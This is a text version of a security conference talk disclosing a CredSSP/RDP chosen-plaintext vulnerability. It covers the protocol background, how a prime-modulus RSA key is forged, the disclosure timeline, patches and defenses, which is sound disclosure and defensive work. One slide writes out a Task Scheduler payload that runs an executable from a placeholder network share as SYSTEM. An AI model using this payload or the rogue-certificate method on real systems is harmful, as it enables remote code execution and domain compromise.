Server Tailgating – A Chosen-Plaintext Attack on RDP
Eyal Karni, Yaron Zinar, Roman Blachman
Speaker Info
• Eyal Karni – Security Researcher @ Preempt
• Yaron Zinar – Lead Security Researcher @ Preempt
• Roman Blachman – Co-founder and CTO @ Preempt
Previous Work
• CVE-2017-8563 (LDAPS NTLM-Relay)
• Microsoft Security Advisory 4056318
Agenda
• Introduction
• Technical Background
• The Vulnerability
• Demo
• Post-Mortem
Introduction
What We Will Show
• A Logical (Cryptographic!) Vulnerability
• High Impact
  • Affecting All Windows Versions
  • Making RDP (Remote Desktop) Vulnerable
• Not fully patched
Attackers Move Laterally…
https://docs.microsoft.com/en-us/advanced-threat-analytics/ata-threats
Technical Background
Kerberos
• Developed by MIT
• Default authentication since Windows 2000
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc772815(v=ws.10)
MSRPC – Microsoft Remote Procedure Call
• Used to expose interfaces on a machine so that they can be called from remote machines
• Used in remote management scenarios
  • PSexec
  • WMI
• No developer wants to dive into this (Everyone uses RESTful stuff)
GSSAPI / SSPI
• SSPI is an API that allows applications to add authenticity and privacy almost transparently.
• Applicable to any application that allows “Windows Authentication”
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc772815(v=ws.10)
TLS (Transport Layer Security)
• Used for traffic encryption
• De-facto standard for encryption
  • Web
  • VoIP
  • …
• Server identity verified via certificate (RSA)
CredSSP
• An MS protocol to facilitate secure credential forwarding
• Mutual authentication
• CredSSP protocol flow
  • Double encryption using TLS/GSS-API
  • Uses a technique called “Channel Binding”
https://technet.microsoft.com/en-us/library/hh921957.aspx
RDP (Remote Desktop Protocol)
• RDP Security
  • Full – NLA (Network Level Authentication) + TLS
  • TLS only
  • No security
• RDP restricted-admin
  • Usually in RDP we have network login + interactive login
  • RDP restricted admin includes only network login (single sign-on)
RDP Flow
• TLS is established
• NLA is carried out using CredSSP
• Certificate validation
• The user sends its password over CredSSP
• Session established – now UI stuff
RDP – Certificate Validation
If Kerberos:
• There will be no validation
If NTLM:
• Certificate will be validated
  • CA server
  • Certificate pinning
Protocols Recap
(Protocol stack diagram) RDP runs over TLS, which carries CredSSP, which in turn uses Kerberos or NTLM; MSRPC uses Kerberos or NTLM directly.
The Vulnerability
The Journey
Looking for NTLM flaws
• Discover CVE-2017-8563
• Tried enabling NTLM-Relay with MiTM only
• Found issue #1 – certificate check only after NLA
The Journey
• Began researching CredSSP
• Found issue #2
Do You See the Issue?
Idea
The public key is encrypted and signed as if it were application data.
Well, what if it could also be valid application data?
Vulnerability Flow Chart
(RDP) Session Initiation → (TLS) Rogue Certificate → (CredSSP) GSS_WrapEx(RogueCert) → (MSRPC) GSS_WrapEx(TaskSch), with a Kerberos U2U Negotiation in between
Can we use any Public Key?
• The public key doesn't get verified
• The public key should still be valid in the TLS session
• But it should still be valid as an RSA key
  • Is this possible?
RSA Quick Overview
• A Public Key Encryption Scheme
• Public key – (N, e)
• Private key – d
• Safe assuming hardness of prime factorization
https://www.tutorialspoint.com/cryptography/public_key_encryption.htm
RSA Quick Overview
$N = pq,\quad \varphi(N) = (p-1)(q-1)$
$e \equiv d^{-1} \pmod{\varphi(N)}$
$m^{e} \equiv c \pmod{N}$
(m: original message, e: public exponent, N: public modulus, c: encrypted message)
“Broken” RSA
$N = p,\quad \varphi(N) = p-1$
$e \equiv d^{-1} \pmod{\varphi(N)}$
$m^{e} \equiv c \pmod{N}$
(m: original message, e: public exponent, N: public modulus, c: encrypted message)
“Broken” RSA
$N = p,\quad \varphi(N) = p-1$
$e \equiv d^{-1} \pmod{\varphi(N)}$
$c^{d} \equiv m \pmod{N}$
(c: encrypted message, d: the exponent anyone can derive from the public exponent e, because $\varphi(N) = p-1$ is known once N is; N: public modulus, m: original message)
Is it easy to find a prime?
• Prime Number Theorem:
  $P(\text{a random } x \text{ is prime}) \approx \frac{\pi(x)}{x} \approx \frac{1}{\ln x}$
• We want to sign ~600 bytes of data
  • Expected number of iterations to find a prime: $\ln(256^{600}) \approx 3327$
  • Only need 2 bytes of freedom in the packet ($\log_{256} \ln(256^{600}) \approx 1.463$)
Obstacle Passed
Requirement For Public Key
• How is the X.509 certificate represented? ASN.1
Public Key Structure (byte layout; header bytes are uncontrolled, the modulus content is controlled):
• Offsets 0–3: 0x30 0x82 0x01 0x0A – ASN.1 SEQUENCE tag and length (uncontrolled)
• Offsets 4–7: 0x02 0x82 0x01 0x01 – ASN.1 INTEGER tag and length of field N (uncontrolled)
• Offsets 8 … 7+len(N): N (controlled)
• Offsets 8+len(N), 9+len(N), 10+len(N) …: ASN.1 INTEGER tag and length of field e, followed by e (uncontrolled)
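As an added illustration (not code from the talk or from Preempt's released tools), the following Python ties together the “Broken” RSA, prime-search and ASN.1 public-key slides from a validator's point of view: a key whose modulus is prime parses as a perfectly well-formed RSAPublicKey and still round-trips encryption, yet its private exponent follows from the public values alone. The DER sample is constructed here with the small prime 2^127 − 1, and all function names are this example's own.

```python
import random
# Constructed sample (not from the talk): a DER RSAPublicKey whose modulus is
# the prime 2^127 - 1 and whose exponent is 65537. Real keys are far larger.
SAMPLE_DER = bytes.fromhex("3017" "0210" "7f" + "ff" * 15 + "0203010001")

def read_tlv(buf, pos, tag):
    # Returns (content, next_pos); tag/length bytes are the fixed prefix
    if buf[pos] != tag:
        raise ValueError("unexpected ASN.1 tag 0x%02x" % buf[pos])
    ln, pos = buf[pos + 1], pos + 2
    if ln & 0x80:  # long form, e.g. 0x82 0x01 0x01 in the slide
        nb = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + nb], "big"), pos + nb
    return buf[pos:pos + ln], pos + ln

def parse_rsa_public_key(der):
    # RSAPublicKey ::= SEQUENCE { modulus INTEGER, publicExponent INTEGER }
    body, end = read_tlv(der, 0, 0x30)
    n_bytes, p = read_tlv(body, 0, 0x02)
    e_bytes, p = read_tlv(body, p, 0x02)
    if p != len(body) or end != len(der):
        raise ValueError("trailing data in RSAPublicKey")
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")

def is_probable_prime(n, rounds=32):
    # Miller-Rabin; enough to flag a prime modulus during validation
    if n < 4 or n % 2 == 0:
        return n in (2, 3)
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True

def modulus_is_sane(N):
    # A prime N makes phi(N) = N - 1 public, and with it the private exponent
    return N > 2 and N % 2 == 1 and not is_probable_prime(N)

def broken_rsa_private_exponent(N, e):
    # d = e^-1 mod (N - 1); encrypt/decrypt still round-trips with it
    return pow(e, -1, N - 1)
```

A client that checks the modulus this way rejects the malformed key before it ever reaches the CredSSP wrap step; a client that only checks that the DER parses does not.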
Finding A Suitable Protocol
• Supports SSPI
• Encoding requirements
  • Application data is non-ASN.1
  • Specific 8-byte prefix which we have no control over
  • Includes some degree of freedom
• Able to do harm with a single signed packet
• Available on a wide variety of machines
• Supports SPNEGO
• Encoding requirements
  • Application data is non-ASN.1
  • Specific 8-byte prefix which we have no control over
  • Includes some degree of freedom
• Able to do harm with a single signed packet
• Available on a wide variety of machines
It is actually MIDL – MSRPC!
#1 Try – Exploiting NTLM
(Diagram: NTLM signature scope vs. encryption scope of the wrapped packet)
#1 Try – Exploiting NTLM
• Supports SPNEGO
• Encoding requirements
  • Application data is non-ASN.1
  • Specific 8-byte prefix which we have no control over
  • Includes some degree of freedom
  • Signature scope (no header!)
• Able to do harm with a single packet
• Available on a wide variety of machines
Ability to do NTLM Relay – Much Stronger!
#2 Try – Exploiting Kerberos
(Diagram: Kerberos signature scope vs. encryption scope of the wrapped packet)
Exploit Details
• MIDL requirements
  • First element is a string
  • Apparently MSRPC ignores the end of the data (so it is chosen as the freedom)
• We encode a Task Registration command
  • For immediate execution
  • The payload is in a share
path: u'aa\x00'
xml: u'<?xml version="1.0"?><Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"><Triggers><RegistrationTrigger/></Triggers><Actions><Exec><Command>\\\\IP\\share\\executable.exe</Command></Exec></Actions></Task>\x00'
flags: 6
sddl: NULL
logonType: 3
cCreds: 1
pCreds: [ userId: u'S-1-5-18\x00' password: NULL flags: 1, ]
Success!
Demo
Post Mortem
Should I care?
• 88.78% of desktops running Windows OS
• 95% of Fortune 500 use Active Directory
• 60% of inspected networks use RDP on a daily-basis
https://1reddrop.com/2017/02/04/windows-10-inching-along-january-2017-shows-25-3-percent-desktop-os-market-share/windows-10-market-share-of-desktop-operating-systems/
Should I care?
• MiTM is a real threat:
  • CVE-2018-0101 (Cisco ASA)
  • ARP Poisoning
  • KRACK
• Easy escalation to domain admin
  • DC Traffic -> DC Admin
Affected Systems
• All Windows Versions
• Affected protocols:
  • RDP (including restricted-admin)
  • WinRM
• Important – proprietary RDP clients are also affected
Patch Details
• NLA before certificate validation (Issue #1)
  • Microsoft has not addressed this issue
  • Recommends using Remote Credential Guard
• Malicious certificate (Issue #2)
  • Protocol was modified so that the public key hash would be signed
  • Added protocol negotiation – needs to be enabled by GPO
  • https://aka.ms/credssp
Disclosure Timeline
• 2017-08-20 – Initial disclosure to MSRC
• 2017-08-30 – MS repro attack and acknowledge issue
• 2017-09-18 – MS requested an extension on 90 days SLA
• 2018-03-12 – A patch is applied to CredSSP client/server MS code
• 2018-04-17 – MS RDP client update to include warning (tentative)
• 2018-05-08 – A 2nd patch will be applied to eradicate vulnerable CredSSP (tentative)
Tools
• We’re releasing the following tools:
  • A malicious cert creation tool
  • A tool performing MiTM attack on RDP
Key Takeaways
• Patching is not enough
• Never sign on untrusted data
• Defense-in-depth
  • Principle of least privilege
• Network segmentation helps!
• Monitor accounts usage
• Reduce spread of admin credentials
Questions